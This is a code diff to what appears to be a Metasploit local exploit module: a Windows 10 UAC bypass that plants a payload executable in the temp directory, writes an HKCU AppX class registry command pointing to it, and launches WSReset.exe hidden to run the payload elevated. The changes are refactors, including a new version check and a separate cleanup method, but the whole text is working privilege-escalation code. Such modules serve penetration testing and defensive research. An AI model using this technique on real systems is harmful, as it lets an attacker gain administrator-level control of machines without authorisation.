@@ -61,7 +61,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    if sysinfo['OS'] =~ /Windows 10/ && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe")
+    version = get_version_info
+    if version.build_number >= Msf::WindowsVersion::Win10_InitialRelease && !version.windows_server? && is_uac_enabled? && exists?('C:\\Windows\\System32\\WSReset.exe')
       return CheckCode::Appears
     end
 
@@ -69,6 +70,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
+    @registry_key = ''
     check_permissions!
     case get_uac_level
     when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
@@ -87,56 +89,59 @@ class MetasploitModule < Msf::Exploit::Local
 
     # get directory locations straight
     win_dir = session.sys.config.getenv('windir')
-    vprint_status("win_dir = " + win_dir)
+    vprint_status('win_dir = ' + win_dir)
     tmp_dir = session.sys.config.getenv('tmp')
-    vprint_status("tmp_dir = " + tmp_dir)
-    exploit_dir = win_dir + "\\System32\\"
-    vprint_status("exploit_dir = " + exploit_dir)
-    reset_filepath = exploit_dir + "WSReset.exe"
-    vprint_status("exploit_file = " + reset_filepath)
+    vprint_status('tmp_dir = ' + tmp_dir)
+    exploit_dir = win_dir + '\\System32\\'
+    vprint_status('exploit_dir = ' + exploit_dir)
+    reset_filepath = exploit_dir + 'WSReset.exe'
+    vprint_status('exploit_file = ' + reset_filepath)
 
     # make payload
-    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.exe'
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(rand(6..13)) + '.exe'
     payload_pathname = tmp_dir + '\\' + payload_name
-    vprint_status("payload_pathname = " + payload_pathname)
-    vprint_status("Making Payload")
+    vprint_status('payload_pathname = ' + payload_pathname)
+    vprint_status('Making Payload')
     payload = generate_payload_exe
     reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}"
     vprint_status("reg_command = " + reg_command)
-    registry_key = "HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
+    @registry_key = 'HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command'
 
     # make registry changes
     vprint_status("Making Registry Changes")
     begin
-      registry_createkey(registry_key)
-      registry_setvaldata(registry_key, "DelegateExecute", '', "REG_SZ")
-      registry_setvaldata(registry_key, '', reg_command, "REG_SZ")
+      registry_createkey(@registry_key)
+      registry_setvaldata(@registry_key, 'DelegateExecute', '', 'REG_SZ')
+      registry_setvaldata(@registry_key, '', reg_command, 'REG_SZ')
     rescue ::Exception => e
       print_error(e.to_s)
     end
-    vprint_status("Registry Changes Complete")
+    vprint_status('Registry Changes Complete')
     # Upload payload
     vprint_status("Uploading Payload to #{payload_pathname}")
     write_file(payload_pathname, payload)
-    vprint_status("Payload Upload Complete")
+    vprint_status('Payload Upload Complete')
 
-    vprint_status("Launching " + reset_filepath)
+    vprint_status('Launching ' + reset_filepath)
     begin
       session.sys.process.execute("cmd.exe /c \"#{reset_filepath}\"", nil, 'Hidden' => true)
     rescue ::Exception => e
       print_error(e.to_s)
     end
-    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
-    # wait for a few seconds before cleaning up
-    sleep(20)
-    vprint_status("Removing Registry Changes")
-    registry_deletekey(registry_key)
-    vprint_status("Registry Changes Removed")
+    print_warning("This exploit requires manual cleanup of '#{payload_pathname}'")
+  end
+
+  def cleanup
+    if @registry_key.present?
+    vprint_status('Removing Registry Changes')
+      registry_deletekey(@registry_key)
+    vprint_status('Registry Changes Removed')
+    end
   end
 
   def check_permissions!
     unless check == Exploit::CheckCode::Appears
-      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
     end
     fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
     # Check if you are an admin
@@ -147,12 +152,10 @@ class MetasploitModule < Msf::Exploit::Local
     if admin_group.nil?
       print_error('Either whoami is not there or failed to execute')
       print_error('Continuing under assumption you already checked...')
+    elsif admin_group
+      print_good('Part of Administrators group! Continuing...')
     else
-      if admin_group
-        print_good('Part of Administrators group! Continuing...')
-      else
-        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
-      end
+      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
     end
 
     if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
